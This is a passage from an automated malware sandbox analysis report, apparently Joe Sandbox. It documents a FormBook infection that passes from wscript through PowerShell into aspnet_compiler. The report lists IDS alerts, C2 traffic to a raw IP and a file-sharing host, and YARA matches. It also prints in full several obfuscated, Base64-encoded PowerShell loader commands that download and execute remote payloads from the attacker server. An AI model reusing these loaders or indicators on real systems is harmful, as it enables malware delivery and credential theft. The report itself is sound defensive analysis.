lib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.pdb source: powershell.exe, 00000003.00000002.1813925745.000000000502D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1812401473.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49732 -> 172.245.123.12:80
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.4:49733
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /361/TELNERA.txt HTTP/1.1Host: 172.245.123.12Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 142.215.209.77 142.215.209.77
                  Source: Joe Sandbox ViewASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.12Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00C97A18 URLDownloadToFileW,3_2_00C97A18
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.12Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /361/TELNERA.txt HTTP/1.1Host: 172.245.123.12Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: 1016.filemail.com
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/seemeb
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1812401473.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1816747098.0000000007039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF
                  Source: powershell.exe, 00000003.00000002.1816747098.0000000007039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFC:
                  Source: powershell.exe, 00000003.00000002.1816922583.00000000070FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFFT_AdaptivePrinterPort.forma
                  Source: powershell.exe, 00000003.00000002.1818468127.00000000080F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftb
                  Source: powershell.exe, 00000003.00000002.1815568460.0000000005B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000004E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000003.00000002.1818468127.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co?
                  Source: powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com
                  Source: powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000004E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000003.00000002.1812401473.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.S
                  Source: powershell.exe, 00000003.00000002.1812401473.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.StorageJob.cdxml27
                  Source: powershell.exe, 00000003.00000002.1816922583.00000000070A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/Author=
                  Source: powershell.exe, 00000003.00000002.1815568460.0000000005B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.4:49733 version: TLS 1.2

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Detected Cobalt Strike Beacon
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
                  Malicious sample detected (through community Yara rule)
                  Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; 